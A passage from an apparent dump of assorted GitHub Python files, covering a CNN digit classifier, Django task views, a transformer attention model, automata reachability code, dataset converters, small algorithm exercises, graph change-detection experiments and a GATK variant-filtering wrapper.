trainX = np.frombuffer(imgpath.read(), np.uint8,\r\n offset=16).reshape(len(trainY), 28, 28)\r\n\r\n with gzip.open(os.path.join('data', paths[2]), 'rb') as lbpath:\r\n testY = np.frombuffer(lbpath.read(), np.uint8, offset=8)\r\n\r\n with gzip.open(os.path.join('data', paths[3]), 'rb') as imgpath:\r\n testX = np.frombuffer(imgpath.read(), np.uint8,\r\n offset=16).reshape(len(testY), 28, 28)\r\n\r\n return (trainX, trainY), (testX, testY)\r\n\r\n# scale pixels\r\ndef prep_pixels(train, test):\r\n\t# convert from integers to floats\r\n\ttrain_norm = train.astype('float32')\r\n\ttest_norm = test.astype('float32')\r\n\t# normalize to range 0-1\r\n\ttrain_norm = train_norm / 255.0\r\n\ttest_norm = test_norm / 255.0\r\n\t# return normalized images\r\n\treturn train_norm, test_norm\r\n\r\n# define cnn model\r\ndef define_model():\r\n\tmodel = Sequential()\r\n\tmodel.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(32, 32, 1)))\r\n\tmodel.add(MaxPooling2D((2, 2)))\r\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform'))\r\n\tmodel.add(Conv2D(64, (3, 3), activation='relu', kernel_initializer='he_uniform'))\r\n\tmodel.add(MaxPooling2D((2, 2)))\r\n\tmodel.add(Flatten())\r\n\tmodel.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))\r\n\tmodel.add(Dense(10, activation='softmax'))\r\n\t# compile model\r\n\topt = SGD(lr=0.01, momentum=0.9)\r\n\tmodel.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\r\n\treturn model\r\n\r\n\r\n# evaluate a model using k-fold cross-validation\r\ndef evaluate_model(dataX, dataY, n_folds=5):\r\n\tscores, histories = list(), list()\r\n\t# prepare cross validation\r\n\tkfold = KFold(n_folds, shuffle=True, random_state=1)\r\n\t# enumerate splits\r\n\tfor train_ix, test_ix in kfold.split(dataX):\r\n\t\t# define model\r\n\t\tmodel = define_model()\r\n\t\t# select rows for train and test\r\n\t\ttrainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]\r\n\t\t# fit model\r\n\t\thistory = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)\r\n\t\t# evaluate model\r\n\t\t_, acc = model.evaluate(testX, testY, verbose=0)\r\n\t\tprint('> %.3f' % (acc * 100.0))\r\n\t\t# stores scores\r\n\t\tscores.append(acc)\r\n\t\thistories.append(history)\r\n\treturn scores, histories\r\n\r\n# plot diagnostic learning curves\r\ndef summarize_diagnostics(histories):\r\n\tfor i in range(len(histories)):\r\n\t\t# plot loss\r\n\t\tpyplot.subplot(2, 1, 1)\r\n\t\tpyplot.title('Cross Entropy Loss')\r\n\t\tpyplot.plot(histories[i].history['loss'], color='blue', label='train')\r\n\t\tpyplot.plot(histories[i].history['val_loss'], color='orange', label='test')\r\n\t\t# plot accuracy\r\n\t\tpyplot.subplot(2, 1, 2)\r\n\t\tpyplot.title('Classification Accuracy')\r\n\t\tpyplot.plot(histories[i].history['accuracy'], color='blue', label='train')\r\n\t\tpyplot.plot(histories[i].history['val_accuracy'], color='orange', label='test')\r\n\tpyplot.show()\r\n\r\n# summarize model performance\r\ndef summarize_performance(scores):\r\n\t# print summary\r\n\tprint('Accuracy: mean=%.3f std=%.3f, n=%d' % (mean(scores)*100, std(scores)*100, len(scores)))\r\n\t# box and whisker plots of results\r\n\tpyplot.boxplot(scores)\r\n\tpyplot.show()\r\n\r\n# run the test harness for evaluating a model\r\ndef run_test_harness():\r\n\t# load dataset\r\n\ttrainX, trainY, testX, testY = load_data()\r\n\t# prepare pixel data\r\n\ttrainX, testX = prep_pixels(trainX, testX)\r\n\t# evaluate model\r\n\tscores, histories = evaluate_model(trainX, trainY)\r\n\t# learning curves\r\n\tsummarize_diagnostics(histories)\r\n\t# summarize estimated performance\r\n\tsummarize_performance(scores)\r\n\r\n# entry point, run the test harness\r\nrun_test_harness()","repo_name":"aldebaran-alpha-tauri/MNIST-digit-detection","sub_path":"base_model_hindi_digits.py","file_name":"base_model_hindi_digits.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19582514537","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\n\nfrom .models import *\nfrom .forms import TaskForm\n# Create your views here.\n\ndef index(request):\n tasks = Task.objects.all()\n form = TaskForm()\n\n # logika simpan\n if request.method=='POST':\n form= TaskForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect ('/')\n\n isi ={\n 'tasks' : tasks,\n 'form' : form,\n }\n return render(request, 'tasks/list.html', isi)\n\ndef update(request, pk):\n tasks = Task.objects.get(id=pk)\n form = TaskForm(instance=tasks)\n\n # logika update\n if request.method == 'POST':\n form = TaskForm(request.POST, instance=tasks)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n isi = {\n 'form' : form\n }\n return render(request, 'tasks/update_task.html', isi)\n\ndef deleteItem(request, pk):\n item = Task.objects.get(id=pk)\n\n # logika hapus\n if request.method == 'POST':\n item.delete()\n return redirect('/')\n\n isi={\n 'item' : item,\n }\n return render(request, 'tasks/delete_task.html', isi)","repo_name":"willianrefky/Todo","sub_path":"django-project/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38741722024","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom nystrom_attention import Nystromformer\n\nclass TransLayer(nn.Module):\n def __init__(self, dim=512, heads=8, depth=1):\n super(TransLayer, self).__init__()\n self.trans = Nystromformer(\n dim = dim,\n dim_head = dim//heads,\n heads = heads,\n depth = depth,\n num_landmarks = dim//2, # number of landmarks\n pinv_iterations = 6, # number of moore-penrose iterations for approximating pinverse. 6 was recommended by the paper\n attn_values_residual = True, # whether to do an extra residual with the value or not. supposedly faster convergence if turned on\n attn_dropout = 0.1,\n ff_dropout = 0.1\n )\n\n def forward(self, x):\n x = self.trans(x)\n return x\n\nclass TransAtt(nn.Module):\n def __init__(self, num_classes, width, depth, heads):\n print('depth: {}, width: {}, heads: {}'.format(depth, width, heads))\n super(TransAtt, self).__init__()\n self.num_classes = num_classes\n self._fc1 = nn.Sequential(nn.Linear(1024, width), nn.ReLU())\n self.trans_layer = TransLayer(dim = width, heads = heads, depth = depth)\n self.attention = nn.Sequential(nn.Linear(width, width//4), nn.Tanh(), nn.Linear(width//4, 1))\n self._fc2 = nn.Linear(width, self.num_classes)\n\n def forward(self, x, **kwargs): \n x = self._fc1(x) #[B, n, width]\n\n # Translayer\n y = self.trans_layer(x)\n\n # Attention pooling\n a = self.attention(y) # [B,n,1]\n a = a.transpose(1, 2) # [B,n,1] -> [B,1,n]\n a = F.softmax(a, dim=2) # [B,1,n]\n z = torch.bmm(a, y).squeeze(1) # [B,1,n]*[B,n,width]=[B,1,width] -> [B,width]\n\n # Predict\n logits = self._fc2(z) #[B, num_classes]\n Y_hat = torch.argmax(logits, dim=1)\n Y_prob = F.softmax(logits, dim=1)\n results_dict = {'logits': logits, 'Y_prob': Y_prob, 'Y_hat': Y_hat, 'Attention': a}\n return results_dict","repo_name":"RuixiangZhao/WSI_classification_baseline","sub_path":"models/trans_att.py","file_name":"trans_att.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32301542007","text":"\nimport copy\nimport wfa.nfa as nfa\nimport wfa.matrix_wfa as matrix_wfa\nimport wfa.core_wfa as core_wfa\nimport wfa.nfa_export as nfa_export\nimport collections\n\nDIRECTORY = \"subautomata\"\nSL_AUT_FILE = \"pa_loop_aut\"\nSL_CLOSURE_FILE = \"pa_loop_closure\"\nCLOSURE_MODE = matrix_wfa.ClosureMode.inverse\nITERATIONS = 100\nMAX_STATES = 40\n\n\"\"\"Wrapper for storing a WFA, initial, final vectors, and a transition closure.\n\"\"\"\nWFAReachabilityWrap = collections.namedtuple('WFAReachabilityWrap', ['wfa', 'ini_vec', 'fin_vec', 'closure'])\n\nclass ApproxNFAReach(object):\n\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self, pa, fa):\n \"\"\"Set input PA and NFA and initialize state weights.\n\n Keyword arguments:\n pa -- PA as an input for a reduction\n nfa -- NFA as an input for a reduction\n \"\"\"\n self._pa = pa\n self._pa.__class__ = matrix_wfa.MatrixWFA\n self._nfa = fa\n self._nfa.__class__ = nfa.NFA\n\n self._language_sum = {}\n self._reachable_states = {}\n self._nfa_tr_dict = {}\n self._pa_tr_dict = {}\n self._sl_automata = {}\n self._sl_closure = {}\n\n def get_language_sum(self):\n \"\"\"Get the language labels.\n\n Return: Dictionary: State (NFA) -> (Dictionary: State (PA) -> Float (weight))\n \"\"\"\n return self._language_sum\n\n def prepare(self):\n \"\"\"Initialize values for a new computation of the state labels.\n \"\"\"\n self._language_sum = {}\n self._reachable_states = {}\n for state in self._nfa.get_states():\n self._language_sum[state] = 0\n self._nfa_tr_dict = self._nfa.get_dictionary_transitions()\n self._pa_tr_dict = self._pa.get_dictionary_transitions()\n\n def _get_pa_states_reachability(self, reach_wrap, lang_aggr, lang_weight):\n \"\"\"Compute new PA state labels from the transition closure, initial and\n final vectors.\n\n Return: (Float(Language weight), Dictinary: State(PA) -> Float(State Label, weight))\n Keyword arguments:\n reach_wrap -- Type WFAReachabilityWrap. Automata reachability information\n (an initial, final weights, and a transition closure)\n lang_aggr -- Current value of the PA state labels.\n lang_weight -- Current state label of the NFA state (beta function).\n \"\"\"\n if len(lang_aggr) < len(self._pa.get_states()):\n for pa_state in self._pa.get_states():\n lang_aggr[pa_state] = 0.0\n\n for old, new in reach_wrap.wfa.get_rename_dict().iteritems():\n if new not in reach_wrap.wfa.get_starts():\n continue\n for old1, new1 in reach_wrap.wfa.get_rename_dict().iteritems():\n lang_aggr[old1[0]] += reach_wrap.ini_vec[0,old[0]] * reach_wrap.closure[new, new1] * reach_wrap.fin_vec[0,new1]\n lang_weight += reach_wrap.ini_vec[0,old[0]] * reach_wrap.closure[new, new1] * reach_wrap.fin_vec[0,new1]\n return (lang_weight, lang_aggr)\n\n def _get_back_nfa(self, state, max_states=None):\n \"\"\"Get backward NFA to a given state (and perform disambiguation if\n necessary). If a size of the automaton is greater than max_states,\n None is returned.\n\n Return: unambiguous NFA or None (if the automaton is too big)\n Keyword arguments:\n state -- State of the NFA to obtain the backward automaton.\n max_states -- Maximum number of states of the back NFA.\n \"\"\"\n nfa_back = self._nfa.get_backward_nfa(state).get_trim_automaton()\n nfa_back.__class__ = nfa.NFA\n if (max_states is not None) and (len(nfa_back.get_states()) > max_states):\n return None\n if not nfa_back.is_unambiguous():\n nfa_back = nfa_back.get_unambiguous_nfa(max_states)\n if nfa_back is not None:\n nfa_back = nfa_back.get_trim_automaton()\n return nfa_back\n\n def process_branch_state(self, state, predecessors):\n \"\"\"Compute approximate state labels of the PA for a state state of the NFA.\n It is assumed that the state state has no self-loop (self-loops are\n ignored).\n\n Keyword arguments:\n state -- State of the NFA.\n predecessors -- List of predecessors of the state state.\n \"\"\"\n lang_aggr = {}\n lang_weight = 0.0\n\n for pa_state in self._pa.get_states():\n lang_aggr[pa_state] = 0.0\n\n for act_pred in predecessors:\n if act_pred == state:\n continue\n\n #Get all transitions from actual predessors\n #rest_nfa_trans = []\n symbols = set([])\n for transition in self._nfa_tr_dict[act_pred]:\n if transition.dest == state:\n #rest_nfa_trans.append(transition)\n symbols.add(transition.symbol)\n # trans_nfa = nfa.NFA(rest_nfa_trans, {state: 1.0}, {act_pred: 1.0})\n #\n # pa_ini_states = self._reachable_states[act_pred] #{k:v for k, v in self._reachable_states[act_pred]}\n # pa_copy = copy.copy(self._pa)\n # pa_copy.set_starts(pa_ini_states)\n\n\n\n #Product of the PA and predecessors automaton\n # spa = pa_copy.product(trans_nfa)\n # spa = spa.get_trim_automaton()\n # spa.rename_states()\n # spa.__class__ = matrix_wfa.MatrixWFA\n\n for st, weight in self._reachable_states[act_pred].iteritems():\n tr_sum = 0.0\n for transition in self._pa_tr_dict[st]:\n if transition.symbol in symbols:\n tr_sum += transition.weight\n lang_aggr[transition.dest] += weight*transition.weight\n lang_weight += tr_sum*weight\n\n #Get initial and final vectors and compute the transition closure\n # closure = spa.compute_transition_closure(CLOSURE_MODE, ITERATIONS)\n # wfa_wrap = WFAReachabilityWrap(spa, pa_copy.get_initial_vector(), spa.get_final_ones(), closure)\n #\n # lang_weight, lang_aggr = self._get_pa_states_reachability(wfa_wrap, lang_aggr, lang_weight)\n\n self._reachable_states[state] = lang_aggr\n self._language_sum[state] = lang_weight\n\n #print state, lang_weight\n\n\n def process_self_loop_state_approx(self, state, sparse=False):\n \"\"\"Compute approximate state labels of the PA for a state state of the NFA.\n It is assumed that the state state has self-loops (transitions from\n predecessors are ignored).\n\n Keyword arguments:\n state -- State of the NFA.\n \"\"\"\n loop_transitions = []\n lang_aggr = dict()\n lang_weight = 0.0\n for sym in self._nfa.get_alphabet():\n loop_transitions.append(core_wfa.Transition(state, state, sym, 1.0))\n loop_nfa = nfa.NFA(loop_transitions, {state: 1.0}, {state: 1.0})\n loop_nfa.rename_states()\n\n pa_ini_states = self._reachable_states[state]\n pa_copy = copy.copy(self._pa)\n pa_copy.set_starts(pa_ini_states)\n\n spa = pa_copy.product(loop_nfa)\n spa = spa.get_trim_automaton()\n spa.rename_states()\n spa.__class__ = matrix_wfa.MatrixWFA\n\n #Get initial and final vectors and compute the transition closure\n closure = spa.compute_transition_closure(CLOSURE_MODE, sparse, ITERATIONS)\n wfa_wrap = WFAReachabilityWrap(spa, pa_copy.get_initial_vector(sparse), spa.get_final_ones(sparse), closure)\n lang_weight, lang_aggr = self._get_pa_states_reachability(wfa_wrap, lang_aggr, lang_weight)\n\n self._reachable_states[state] = lang_aggr\n self._language_sum[state] = lang_weight\n\n\n def process_states(self, sparse=False):\n \"\"\"Compute the state labels of all states of the NFA.\n \"\"\"\n for state in self._nfa.topological_sort_states():\n predecessors = list(self._nfa.get_predecessors(state))\n\n if state in predecessors:\n nfa_back = self._get_back_nfa(state, MAX_STATES)\n if nfa_back is None:\n self.process_branch_state(state, predecessors)\n self.process_self_loop_state_approx(state, sparse)\n else:\n self.process_backward_state(nfa_back, state, sparse)\n elif len(predecessors) >= 1:\n self.process_branch_state(state, predecessors)\n else:\n nfa_back = self._get_back_nfa(state, None)\n self.process_backward_state(nfa_back, state, sparse)\n #print state\n\n def process_backward_state(self, nfa_back, state, sparse=False):\n \"\"\"Compute state labels of the PA for a state state of the NFA (using\n the subautomata method).\n\n Keyword arguments:\n nfa_back -- Backward NFA.\n state -- State of the NFA whose state labels are computed.\n \"\"\"\n nfa_back.set_all_finals()\n wfa_back = self._pa.product(nfa_back)\n wfa_back = wfa_back.get_trim_automaton()\n wfa_back.rename_states()\n wfa_back.__class__ = matrix_wfa.MatrixWFA\n\n closure = wfa_back.compute_transition_closure(CLOSURE_MODE, sparse, ITERATIONS)\n wfa_wrap = WFAReachabilityWrap(wfa_back, self._pa.get_initial_vector(sparse), wfa_back.get_final_ones(sparse), closure)\n\n lang_weight, lang_aggr = self._get_pa_states_reachability(wfa_wrap, dict(), 0.0)\n\n self._reachable_states[state] = lang_aggr\n self._language_sum[state] = lang_weight\n #print self._reachable_states[state]\n","repo_name":"ondrik-network-hw/appreal","sub_path":"reduce/label/approximate_nfa_reachability.py","file_name":"approximate_nfa_reachability.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"31599024291","text":"\"\"\"\n This module converts COCO format dataset to labelme JSON files.\n\"\"\"\n\nimport glob\nimport os\nimport logging\nimport json\nfrom pathlib import Path\nfrom labelme.shape import Shape\nfrom keypoints import save_labels\n\nlogger = logging.getLogger(__name__)\n\n\nclass COCO2Labeme():\n \"\"\"\n Given COCO format dataset with annotation.json file and the parent \n folder that contains the images as provided in annotion images dict.\n Usage:\n cl = COCO2Labeme('/path/to/annotations_jsons',\n 'path/to/images_dir')\n cl.convert()\n \"\"\"\n\n def __init__(self, annotions, images_dir) -> None:\n self.annotations = annotions\n self.images_dir = images_dir\n\n def get_annos(self):\n \"\"\"find all anon json files\n\n Returns:\n list: json files\n \"\"\"\n annos = glob.glob(self.annotations + '/*.json')\n return annos\n\n def parse_coco_json(self, json_file):\n if not os.path.exists(json_file):\n logger.info(\"{json_file} does not exist\")\n\n with open(json_file, 'r') as jf:\n data = json.load(jf)\n return data\n\n def to_labelme(self, json_data):\n class_names = [name['name'] for name in json_data['categories']]\n images = json_data['images']\n annotations = json_data['annotations']\n\n for i, img in enumerate(images):\n label_list = []\n img_id = img['id']\n img_file_name = os.path.join(self.images_dir, img['file_name'])\n if not os.path.exists(img_file_name):\n logger.info(f\"Image file {img_file_name} does not exist!\")\n continue\n img_file_json = Path(img_file_name).with_suffix('.json')\n img_height = img['height']\n img_width = img['width']\n for annos in annotations:\n if int(annos['image_id']) == int(img_id):\n points = annos['segmentation'][0]\n cat_id = annos['category_id']\n\n s = Shape(label=class_names[cat_id],\n shape_type='polygon', flags={})\n for k in range(0, len(points)-1, 2):\n s.addPoint((points[k], points[k+1]))\n label_list.append(s)\n save_labels(img_file_json,\n img_file_name, label_list, img_height, img_width)\n\n def convert(self):\n json_files = self.get_annos()\n for jf in json_files:\n json_data = self.parse_coco_json(jf)\n self.to_labelme(json_data)\n logger.info(f\"Finished {jf} .\")\n\n\nif __name__ == '__main__':\n cl = COCO2Labeme('/path/to/dataset_coco/',\n '/path/to/dataset_coco/')\n cl.convert()\n","repo_name":"healthonrails/annolid","sub_path":"annolid/annotation/coco2labelme.py","file_name":"coco2labelme.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"3854778377","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the breakingRecords function below.\ndef breakingRecords(scores):\n h_no = 0\n highest = scores[0]\n lowest = scores[0]\n l_no = 0\n for i in scores:\n if i > highest:\n h_no = h_no + 1\n highest = i \n if i < lowest:\n l_no = l_no + 1\n lowest = i\n \n return h_no,l_no\n \n \n \n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n scores = list(map(int, input().rstrip().split()))\n\n result = breakingRecords(scores)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"darshanvjani/HackerRank_Practive","sub_path":"Algorithm/Breaking the Records.py","file_name":"Breaking the Records.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19552808866","text":"import math\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\nfrom scipy.linalg import subspace_angles\n\n### HELPER FUNCTIONS ###\n\ndef subspace_dist(A, B):\n '''\n Inputs: \n A, B - Two subspaces (columns of each matrix are basis for the subspace)\n Outputs: The distance between the two subspaces, defined as the Frobenius norm of the sine of principal angles\n '''\n return np.linalg.norm(np.sin(subspace_angles(A, B)))\n\ndef post_change_subspace(alpha, k, p0, p1, n):\n '''\n Inputs: \n alpha - parameter for proportion of nodes in C1, \n k - dimension of subspace\n p0, p1 - probabilities for edges within/between communities\n n - num of nodes\n Outputs: Leading k-dimensional subspace of expected post-change graph\n '''\n # Construct expected adjacency matrix\n n1 = round(n*alpha) # number of nodes in C1\n A_expected = p0*np.ones((n, n))\n A_expected[:n1, :n1] = p1 # Expected value for the upper left block is p1, rest are p0\n\n # Compute leading subspace\n wA, U = np.linalg.eigh(A_expected)\n return U[:, -k:]\n\n\ndef edd_vs_arl_param(trials, c):\n '''\n Input: \n trials - Number of trials to run\n c - correction parameter to use\n Output: edd and arl vectors averaged over the number of trials\n '''\n edd_avg = np.zeros(20)\n arl_avg = np.zeros(20)\n\n for t in range(trials):\n\n print(\"Starting Trial \" + str(t))\n\n ### INITIAL GRAPH: ERDOS-RENYI(n, p) ###\n\n n = 100 # number of nodes\n p0 = 2*math.log(n)/n # initial connection probability\n\n G0 = nx.generators.random_graphs.erdos_renyi_graph(n, p0)\n A0 = nx.to_numpy_matrix(G0)\n\n ### POST-CHANGE GRAPH: SBM (2 COMMUNITIES) ###\n\n p1 = 5*p0 # prob of edge within the emerging faction (community emerges on top of underlying E-R model)\n alpha = 0.15 # proportion of nodes in C1 (range from 0 to 1)\n\n size = round(n*alpha) # Size of faction\n A1 = A0.copy()\n for i in range(size):\n for j in range(i):\n if random.random() < p1:\n A1[i, j] = 1\n A1[j, i] = 1\n else:\n A1[i, j] = 0\n A1[j, i] = 0\n\n # plt.imshow(A0)\n # plt.title(\"Initial Adjacency Matrix\")\n # plt.show()\n # plt.imshow(A1)\n # plt.title(\"Post-Change Adjacency Matrix\")\n # plt.show()\n\n ### GENERATE SIGNALS ###\n\n # Define graph filter\n poly = lambda x: x**2\n H0 = poly(A0)\n H1 = poly(A1)\n\n # Signal parameters\n m = 10000 # number of signals to generate\n\n # Generate signals\n W = np.random.multivariate_normal(np.zeros(n), np.eye(n), m).T # white noise\n Y_arl = np.dot(H0, W) # pre-change only (for ARL calculation)\n Y_edd = np.dot(H1, W) # post-change only (for EDD calculation)\n\n\n ### DETECTION SETUP ###\n\n k = 2 # Number of eigenvectors to consider\n window_size = 25 # For covariance estimates\n\n wA, U = np.linalg.eigh(A0)\n U0 = U[:, -k:] # Initial subspace\n\n alphas = 0.01 * np.array(range(10, 91)) # Possible parameter values (discretized range from 0.25-0.75)\n U1 = {a:post_change_subspace(a, k, p0, p1, n) for a in alphas} # Dict alpha: subspace(alpha)\n\n cusum_arl = [0]\n for i in range(m - window_size + 1):\n window = Y_arl[:, i:i+window_size] # Signals in the current window\n C_hat = (1/window_size) * np.dot(window, window.T) # Empirical covariance\n wCs, Us = np.linalg.eigh(C_hat)\n U_hat = Us[:, -k:] # observed subspace\n alpha_hat = max(alphas, key=lambda a: np.linalg.norm(U1[a].T @ U_hat)) # Parameter estimate\n Lt = subspace_dist(U0, U1[alpha_hat]) - subspace_dist(U_hat, U1[alpha_hat]) - c\n cusum_arl.append(max(0, cusum_arl[-1] + Lt))\n\n cusum_edd = [0]\n for i in range(m - window_size + 1):\n window = Y_edd[:, i:i+window_size] # Signals in the current window\n C_hat = (1/window_size) * np.dot(window, window.T) # Empirical covariance\n wCs, Us = np.linalg.eigh(C_hat)\n U_hat = Us[:, -k:] # observed subspace\n alpha_hat = max(alphas, key=lambda a: np.linalg.norm(U1[a].T @ U_hat)) # Parameter estimate\n Lt = subspace_dist(U0, U1[alpha_hat]) - subspace_dist(U_hat, U1[alpha_hat]) - c\n cusum_edd.append(max(0, cusum_edd[-1] + Lt))\n\n\n thresholds = np.linspace(0.0, 1.5, 20)\n edd = []\n arl = []\n\n for threshold in thresholds:\n # ARL calculation\n rl = next((i for i in range(m-window_size+1) if cusum_arl[i] > threshold), m) # first index where cusum > threshold\n arl.append(rl)\n # EDD calculation\n dd = next((i for i in range(m-window_size+1) if cusum_edd[i] > threshold), m) # first index where cusum > threshold\n edd.append(dd)\n \n print(arl)\n print(edd)\n edd_avg += edd\n arl_avg += arl\n\n arl_avg /= trials\n edd_avg /= trials\n return arl_avg, edd_avg\n\n\nif __name__ == \"__main__\":\n for c in [0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07]:\n print(\"c = \" + str(c))\n arl, edd = edd_vs_arl_param(trials=25, c=c)\n np.save(\"ef_param_arl_\" + str(c), arl)\n np.save(\"ef_param_edd_\" + str(c), edd)\n\n\n\n\n# plt.plot(arl, edd)\n# plt.xscale('log')\n# plt.xlabel(\"Average Run Length\")\n# plt.ylabel(\"Expected Detection Delay\")\n# plt.title(\"EDD vs ARL for Emerging Faction\")\n# plt.show()","repo_name":"chiraagk7/graph-cusum","sub_path":"Emerging Community/edd_vs_arl.py","file_name":"edd_vs_arl.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73877834614","text":"stack=[]\r\ndef push():\r\n element=input(\"enter the element to be inserted:\")\r\n stack.append(element)\r\n print(stack) \r\n return\r\n\r\ndef pop():\r\n if len(stack)==0:\r\n print(\"the stack is empty\")\r\n else:\r\n e=stack.pop()\r\n print(\"the removed element is:\",e)\r\n print(stack)\r\n\r\ndef full():\r\n print(\"the stack is overloaded\")\r\n print(\"select one option to perform operation on stack:\")\r\n print(\"enter \\\"2\\\" for removing an element\")\r\n print(\"enetr \\\"3\\\" to exit\")\r\n choice=int(input(\"please enter your choice:\"))\r\n if choice==2:\r\n pop()\r\n elif choice==3:\r\n exit\r\n else:\r\n print(\"please enter a valid choice\")\r\n\r\n\r\ndef empty():\r\n print(\"the stack is empty\")\r\n print(\"select one option to perform operation on stack:\")\r\n print(\"enter \\\"1\\\" for inserting an element\")\r\n print(\"enetr \\\"3\\\" to exit\")\r\n choice=int(input(\"please enter your choice:\"))\r\n if choice==1:\r\n push()\r\n elif choice==3:\r\n exit\r\n else:\r\n print(\"please enter a valid choice\")\r\nn=int(input(\"please enter the limit of stack:\"))\r\nwhile True:\r\n print(\"select one option to perform operation on stack:\")\r\n print(\"enter \\\"1\\\" for pushing an element\")\r\n print(\"enter \\\"2\\\" for removing an element\")\r\n print(\"enetr \\\"3\\\" to exit\")\r\n choice=int(input(\"please enter your choice:\"))\r\n if choice==1:\r\n if len(stack)>n-1:\r\n full()\r\n else:\r\n push()\r\n elif choice==2:\r\n if len(stack)==0:\r\n empty()\r\n else:\r\n pop()\r\n elif choice==3:\r\n break\r\n \r\n else:\r\n print(\"please enter a valid choice\")\r\n","repo_name":"gangadhararaviteja/Data-structures","sub_path":"Data Structures/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72775046774","text":"import sys\r\ninput=sys.stdin.readline\r\n\r\n\r\narr = list(map(str, input().strip()))\r\nstack = []\r\nanswer = \"\"\r\n\r\n\r\nfor i in arr:\r\n if i.isalpha():\r\n answer+=i\r\n elif i==\"(\":\r\n stack.append(i)\r\n elif i==\"*\" or i==\"/\":\r\n while stack and (stack[-1]==\"*\" or stack[-1]==\"/\"):\r\n answer+=stack.pop()\r\n stack.append(i)\r\n elif i==\"+\" or i==\"-\":\r\n while stack and stack[-1] !=\"(\":\r\n answer+=stack.pop()\r\n stack.append(i)\r\n elif i==\")\":\r\n while stack and stack[-1]!=\"(\":\r\n answer+=stack.pop()\r\n stack.pop()\r\n\r\n\r\nwhile stack:\r\n answer+=stack.pop()\r\n\r\n\r\nprint(answer)","repo_name":"JangAyeon/Algorithm","sub_path":"백준/Gold/1918. 후위 표기식/후위 표기식.py","file_name":"후위 표기식.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4655180384","text":"# Email:fanyucai1@126.com\n# 2019.1.7\n\nimport os\nimport subprocess\nimport argparse\n\nGATK4 = \"/data02/software/GATK/gatk-4.0.11.0/gatk\"\njava = \"/data02/software/java/jdk1.8.0_191/bin/\"\n\nparser = argparse.ArgumentParser(\"This script will filter vcf.\")\nparser.add_argument(\"-v\", \"--vcf\", help=\"your vcf\", type=str, required=True)\nparser.add_argument(\"-r\", \"--ref\", help=\"reference fasta\", type=str, required=True)\nparser.add_argument(\"-o\", \"--outdir\", help=\"output directory\", type=str, default=os.getcwd())\nparser.add_argument(\"-p\", \"--prefix\", help=\"prefix of output,default:out\", type=str, default=\"out\")\n\nresult = parser.parse_args()\nresult.vcf=os.path.abspath(result.vcf)\nresult.ref=os.path.abspath(result.ref)\n\nif result.outdir:\n result.outdir=os.path.abspath(result.outdir)\n subprocess.check_call(\"mkdir -p %s\" %(result.outdir),shell=True)\nos.chdir(result.outdir)\n\n##############################################https://github.com/gatk-workflows/gatk3-4-rnaseq-germline-snps-indels/blob/master/rna-germline-variant-calling.wdl\nif result.type == \"RNAseq\":\n subprocess.check_call(\n \"export PATH=%s\\$PATH && %s --java-options -Xmx10G VariantFiltration -R %s -V %s -cluster 3 -window 35 -filter-name \\\"FS\\\" -filter \\\"FS > 30.0\\\" -filter-name \\\"QD\\\" -filter \\\"QD < 2.0\\\" -O %s/%s.vcf\" %(java,GATK4,result.ref,result.vcf,result.out,result.prefix),shell=True)","repo_name":"fanyucai1/script","sub_path":"GATK_RNAseq_vcf_filter.py","file_name":"GATK_RNAseq_vcf_filter.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74435871148","text":"def search_tree(key, tree):\n visited = []\n while tree is not None:\n node_key, value, left, right = tree\n visited.append(node_key)\n if key == node_key:\n return (value, visited)\n elif key < node_key:\n tree = left\n else:\n tree = right\n return None\n","repo_name":"PedroLunet/FP","sub_path":"TP11/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6880146728","text":"import datetime\nimport sys\n\nfrom PyQt5.QtWidgets import QFormLayout, QHBoxLayout\nfrom PyQt5.QtWidgets import QLabel, QComboBox\nfrom PyQt5.QtWidgets import QPushButton, QApplication\nfrom 